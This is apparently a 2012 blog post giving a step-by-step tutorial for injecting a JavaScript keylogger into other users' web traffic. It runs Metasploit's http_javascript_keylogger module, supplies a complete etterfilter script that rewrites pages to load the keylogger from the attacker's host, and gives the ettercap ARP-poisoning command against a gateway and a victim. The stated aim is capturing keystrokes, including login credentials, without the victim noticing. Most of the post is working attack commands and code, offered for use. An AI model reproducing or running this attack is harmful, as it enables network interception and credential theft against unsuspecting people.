Saturday, August 18, 2012

Injecting keylogger


Injecting keylogger

The Used Tools;
metasploit auxiliary module (http_javascript_keylogger)
ettercap

DEMO,

1- Run "http_javascript_keylogger" module

msf > use auxiliary/server/capture/http_javascript_keylogger



This auxiliary module create javascript which could be injected in web page to record the keys pressed by the user inside this page only, including his login credentials.

After running this module, it would give you a link. To use it, appaend "/anyname.js" , you name it anything you want.
I set URIPATH to "keylogger" ==> This is the link:

http://192.168.45.191:8080/keylogger/anyname.js
http://ip:SRVPORT/URIPATH/anyname.js

By now, you have your javascript link, How to inject it?

you could inject it via XSS or network spoofing.

I'll use ettercap to manipulate (by etterfilter) the wep pages on the network and inject my javacript

2- The filter script used for injection:


if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.dst == 80 || tcp.dst == 8080) {

 if (search(DATA.data, "Accept-Encoding")) {

 replace("Accept-Encoding", "Accept-Nothing!");

 }

}

if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.src == 80 || tcp.src == 8080) {

 if (search(DATA.data, "<head>")){

 replace("<head>","<head><script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>");

 msg("Keylogger injected :) \n");

 }

 if (search(DATA.data, "<HEAD>")){

 replace("<HEAD>","<BHEAD><SCRIPT SRC='http://192.168.45.191:8080/keylogger/anything.js'> </script>");

 msg("Keylogger injected :) \n");

 }

}

This filter append "<script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>" to "<head>" which make it be loaded imediatly



3- save it as txt file, then compile with etterfilter to binary. This is MUST, because ettercap won't use ascii filter.
Use this command
etterfilter etterkeylogger -o etterkeylogger.ef"

where "etterkeylogger" is the file which contain the filter script and "etterkeylogger.ef" is the output binary file which is used by ettercap



4- The used ettercap command :

root@bt:~# ettercap -T -M arp -F etterkeylogger.ef /192.168.1.1/ /192.168.1.104/ 
where,
-T => for console mode
-M arp => for arp poisoning attack to redirect the traffic to your machine, (don't worry, it then forward the requests to the Web, so the victim won't notice any change)

-F etterkeylogger.ef => is the compiled binary filter script produced by etterfilter
/192.168.1.1/ => target 1 (default gateway)
/192.168.1.104/ = target 2 (victim)

The RESULT






1 comment:

  1. Awesome! I may see if I can help automate this via a shell script or something. :-)

    ReplyDelete